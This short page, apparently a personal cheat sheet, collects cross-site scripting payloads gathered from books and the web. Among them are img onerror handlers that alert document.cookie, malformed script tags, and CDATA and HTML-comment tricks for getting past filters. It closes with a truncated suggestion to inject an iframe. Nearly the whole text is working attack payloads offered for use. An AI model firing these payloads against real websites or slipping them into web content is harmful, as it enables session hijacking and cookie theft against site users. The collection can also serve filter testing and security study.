XSS Cheatsheet
I have pinched these variations from books read and other sources on the tinternet <IMG SRC="v" onerror="alert(document.cookie)"> <img src="v:v" onerror="alert(img-src-js-xss)"></img> <<SCRIPT>a=/XSS-B/ alert(a.source)</SCRIPT> <![CDATA[<img src="v:v" onerror="alert(XSS-CDATA)"></img>]]> <h1><![CDATA[<img src="v:v" onerror="alert(XSS-CDATA)"></img>]]></h1> X<!--<img src="v:v" onerror="alert(XSS-Comments)"></img>-->ML X<!--><img src="v:v" onerror="alert(XSS-Comments)"></img>-->ML Always nice to stick an iframe in for visual impact. some people don't appreciate the simplicity NAY! the beauty and finess of alert(1) //sarcasm <iframe ...